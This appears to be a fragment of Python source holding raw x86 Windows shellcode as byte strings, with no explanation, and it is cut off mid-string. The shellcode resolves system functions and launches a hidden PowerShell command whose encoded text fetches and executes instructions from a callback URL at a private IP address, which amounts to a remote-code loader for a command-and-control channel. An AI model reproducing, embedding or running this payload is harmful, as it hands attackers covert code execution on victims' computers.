    b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0"
    b"\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b"
    b"\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61"
    b"\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2"
    b"\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11"
    b"\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3"
    b"\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6"
    b"\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75"
    b"\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b"
    b"\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
    b"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24"
    b"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a"
    b"\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00"
    b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb"
    b"\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
    b"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47"
    b"\x13\x72\x6f\x6a\x00\x53\xff\xd5\x70\x6f\x77"
    b"\x65\x72\x73\x68\x65\x6c\x6c\x20\x2d\x45\x6e"
    b"\x63\x6f\x64\x65\x64\x43\x6f\x6d\x6d\x61\x6e"
    b"\x64\x20\x53\x51\x42\x75\x41\x48\x59\x41\x62"
    b"\x77\x42\x72\x41\x47\x55\x41\x4c\x51\x42\x46"
    b"\x41\x48\x67\x41\x63\x41\x42\x79\x41\x47\x55"
    b"\x41\x63\x77\x42\x7a\x41\x47\x6b\x41\x62\x77"
    b"\x42\x75\x41\x43\x41\x41\x4b\x41\x42\x4a\x41"
    b"\x47\x34\x41\x64\x67\x42\x76\x41\x47\x73\x41"
    b"\x5a\x51\x41\x74\x41\x46\x49\x41\x5a\x51\x42"
    b"\x7a\x41\x48\x51\x41\x54\x51\x42\x6c\x41\x48"
    b"\x51\x41\x61\x41\x42\x76\x41\x47\x51\x41\x49"
    b"\x41\x41\x74\x41\x46\x55\x41\x63\x67\x42\x70"
    b"\x41\x43\x41\x41\x4a\x77\x42\x6f\x41\x48\x51"
    b"\x41\x64\x41\x42\x77\x41\x44\x6f\x41\x4c\x77"
    b"\x41\x76\x41\x44\x45\x41\x4f\x51\x41\x79\x41"
    b"\x43\x34\x41\x4d\x51\x41\x32\x41\x44\x67\x41"
    b"\x4c\x67\x41\x78\x41\x44\x41\x41\x4d\x41\x41"
    b"\x75\x41\x44\x45\x41\x4e\x77\x41\x32\x41\x43"
    b"\x38\x41\x59\x51\x42\x75\x41\x48\x55\x41\x59"
    b"\x67\x42\x70\x41\x48\x4d\x41\x4c\x77\x42\x6a"
    b"\x41\x47\x45\x41\x62\x41\x42\x73\x41\x47\x49"
    b"\x41\x59\x51\x42\x6a\x41\x47\x73\x41\x4c\x77"
    b"\x42\x70\x41\x47\x34\x41\x63\x77\x42\x30\x41"
    b"\x48\x49\x41\x64\x51\x42\x6a\x41\x48\x51\x41"
    b"\x61\x51\x42\x76\x41\x47\x34\x41\x63\x77\x41"
    b"\x75\x41\x48\x41\x41\x61\x41\x42\x77\x41\x43"
    b"\x63\x41\x4b\x51\x41\x3d\x20\x2d\x57\x69\x6e"
    b"\x64\x6f\x77\x53\x74\x79\x6c\x65\x20\x48\x69"
